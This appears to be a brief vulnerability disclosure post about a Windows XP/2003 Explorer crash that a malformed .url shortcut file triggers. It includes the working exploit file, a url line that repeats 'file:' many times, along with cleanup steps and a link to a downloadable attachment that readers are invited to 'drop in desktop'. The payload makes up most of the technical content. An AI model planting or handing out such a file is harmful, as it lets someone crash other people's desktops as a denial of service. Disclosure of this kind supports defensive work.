Windows Explorer URL File format overflow


Affected Vendor:
Microsoft 

Affected Products:
WindowsXP ALL
Windows2003 ALL


Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash.




if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...


if you will del exploit.url
open taskmgr.exe
open cmd.exe

then cd your desktop

del exploit.url




Exploit:

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:


Attachment:
http://hitcon.org/Nanika-desktop_explore_0day.rar
you can drop in desktop :P


http://hitcon.org
http://www.chroot.org